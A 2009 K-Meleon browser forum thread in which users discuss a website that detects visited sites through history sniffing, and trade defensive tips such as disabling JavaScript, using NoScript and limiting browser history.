General :  K-Meleon Forum
General discussion about K-Meleon. 
Vulnerabilities
Posted by: AirSpirit
Date: April 23, 2009 11:14PM

http://startpanic.com/
This site can tell you what sites you've visited using browser's vulnerabilities. K-Meleon is vulnerable too sad smiley

Options: ReplyQuote
Re: Vulnerabilities
Posted by: nico
Date: April 24, 2009 01:46AM

wait for the experts of K-Meleon.

http://bcheck.scanit.be/bcheck/


Options: ReplyQuote
Re: Vulnerabilities
Posted by: panzer
Date: April 24, 2009 02:11AM

Our experts always find a way to calm us down. smiling smiley

Options: ReplyQuote
Re: Vulnerabilities
Posted by: Yogi
Date: April 24, 2009 02:43AM

I'm no expert let alone of K-Meleon.
Nevertheless:

Quote
AirSpirit
This site can tell you what sites you've visited using browser's vulnerabilities.

Nope, no vulnerability is involved. You can tell which sites have been visited in case JavaScript is enabled in your browser only by comparing against a list of sites the webmaster of the snooping site has prepared.
You could avoid this kind of snooping by disabling JavaScript or (if browser settings make it possible) by disabling colored visualisation of visited links .

After rethinking:
Meddling with CSS won't help. The only counter measure would be to turn of JavaScript or at least I thought so untill I saw and tested the CSS hack Fred reffered to.

However we shouldn't forget about AJAX which is capable of even more nasty things.

@ nico

At least this is what I get with my settings (+ Proxomitron) I use on a regular basis.


This however shouldn't mean at all that K-Meleon wouldn't crash with default settings.



Edited 2 time(s). Last edit at 04/25/2009 05:15AM by Yogi.

Options: ReplyQuote
Re: Vulnerabilities
Posted by: nico
Date: April 24, 2009 03:15AM

my settings + immunize function Spybot-S&D and SpywareBlaster.



Options: ReplyQuote
Re: Vulnerabilities
Posted by: disrupted
Date: April 24, 2009 05:51AM

actually any site can trace back your tracks with a good javascript.. this one was lousy. i left it uhing and ohing for like half an hour and went to work while it humped my processor and all it could find were the last and first entries in history.

if you're paranoid, you can disable js for global policy and enable js for just sites you surf frequently and trust using policies manager.
http://kmeleon.sourceforge.net/forum/read.php?1,91203

and if you're really paranoid, you can do your online banking and ebay purchasing etc in 'privacy mode'
http://kmeleon.sourceforge.net/forum/read.php?1,83391,83558



Options: ReplyQuote
Re: Vulnerabilities
Posted by: Yogi
Date: April 24, 2009 06:24AM

No matter how paranoid someone might be, that's not a security risk.
If the snooping webmaster has a list containing e.g.:
www.bigboobies.gov
which I've visited than he will know that I was visiting that site.
Even so he can't see that I visited e.g.:
www.bigboobies/logme_in/pass_ohoh/haleluia.gov

Not to mention that all purchases are done over a secure/encrypted connection.

Options: ReplyQuote
Re: Vulnerabilities
Posted by: caktus
Date: April 24, 2009 09:38AM

Vulnerabilities?

Often vulnerabilities are caused by the dope behind the weapon rather than the weapon itself.tongue sticking out smiley

Charlie

~~If it ain't broke, why screw it up?~~


Options: ReplyQuote
Re: Vulnerabilities
Posted by: xray
Date: April 24, 2009 07:27PM

js is disabled mainly on this browser. still, if every honk-site is able to trace the history of gecko/km via js then something is really wrong with its architecture, period.

Options: ReplyQuote
Re: Vulnerabilities
Posted by: disrupted
Date: April 24, 2009 09:10PM

Quote
caktus
Vulnerabilities?

Often vulnerabilities are caused by the dope behind the weapon rather than the weapon itself.tongue sticking out smiley
grinning smiley so true

Options: ReplyQuote
Re: Vulnerabilities
Posted by: Fred
Date: April 24, 2009 09:16PM

Reading out part of the history is probably possible
with any browser that has enabled javascript.
But it seems only possible to compare a prewritten
list of sites, so only the sites included in this list can
be found.
It seems even to be possible without enabled javascript
using a CSS hack, as is described here :

http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/

but still only for sites in a prewritten list,

But this would work only, if there is a browser history
present.
For example, it is not possible for my variation
KM18121forCD-Kiosk, which has no history and no cache,
because it's purpose is to work from a CD or stick
without writing anything on the used computer.
But you can also set for all variations your history
to work for 0 days, to disable history snooping,
although this would make it less confortable to
search your history yourself.
Allowing javascript to only a few websites, where it
is really necessary, be it using NoScript or simply
using an on/off button would also reduce the risk
and is generally not a bad idea, because many malware
actions work only with javascript enabled, and a site
working with javascript only is basically bad in my
personal opinion.

Fred

Options: ReplyQuote
Re: Vulnerabilities
Posted by: guenter
Date: April 24, 2009 10:48PM

Quote
xray
if every honk-site is able to trace the history of gecko/km via js then something is really wrong with its architecture

Its a trick relying on cache - every browser tends to have & use a cache smiling smiley
It saves bandwidth.

First they used cookies, when users became aware the used web-bugs, JS, cache & IPs for tracking.

They want their interest, behavior and moving statistics for e-commerce.

Options: ReplyQuote
Re: Vulnerabilities
Posted by: desga2
Date: April 25, 2009 01:26AM

http://bcheck.scanit.be/bcheck/
It isn't a reliable test for current vulnerabilities because all K-Meleon 1.5.x versions with default config and Flash 10 plugin pass the test but also Firefox 2.0.0.20 pass the test. (Option: "Run all available tests")

K-Meleon in Spanish



Edited 2 time(s). Last edit at 04/25/2009 01:28AM by desga2.

Options: ReplyQuote
Re: Vulnerabilities
Posted by: AirSpirit
Date: April 28, 2009 01:35AM

Thanks for your answers smiling smiley
Probably I'll install NoScript for K-Meleon.

Options: ReplyQuote
Re: Vulnerabilities
Posted by: nico
Date: April 28, 2009 02:20AM

privoxy even I was not saved surprised smiley



Options: ReplyQuote
Re: Vulnerabilities
Posted by: nico
Date: April 28, 2009 03:01AM

Quote
Fred
because many malware actions work only with javascript enabled, and a site working with javascript only is basically bad in my personal opinion.

Flashblock and my weakness sad smiley

Options: ReplyQuote
Re: Vulnerabilities
Posted by: Fred
Date: April 28, 2009 07:02AM

To watch Youtube flash videos without javascript
you can use the macro OnlyVideo.kmm .

http://kmeleon.sourceforge.net/wiki/KmmOnlyVideo

This right click macro opens and plays the flash video
in a new window.
Javascript can be turned off.
With javascript off or Noscript, most other flash will not play,
and can probably at least not be dangerous, if it plays
without javascript.
To play a specific flash video from a trusted site,
allow it as the case arises in NoScript, or turn on
javascript for the site.

Fred

Options: ReplyQuote


K-Meleon forum is powered by Phorum.